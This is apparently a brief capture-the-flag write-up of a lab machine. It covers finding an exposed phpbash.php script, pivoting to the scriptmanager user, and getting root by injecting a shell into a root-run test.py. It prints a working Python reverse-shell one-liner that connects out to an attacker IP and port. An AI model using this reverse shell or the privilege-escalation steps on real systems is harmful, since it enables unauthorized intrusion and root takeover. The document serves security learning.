80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Externally accessible php script which allows remote code execution.
Writable python file running as root.
Dirb found /dev/ which was hosting a phpbash.php script which allowed remote code execution.
The following shell worked:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.11",2492));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
This user was restricted so looking at the /etc/passwd file we found a user
We executed the same reverse shell on port 443 as the user scriptmanager
So now we have a low privileged user as scriptmanager
We found a scripts folder in the root dir
We could see it was running the test.py file as root so we could inject a shell into the test.py file to see if that would give us a reverse root shell on port 444.
Checking the contents of test.py.
After a breif period we found we had a root shell,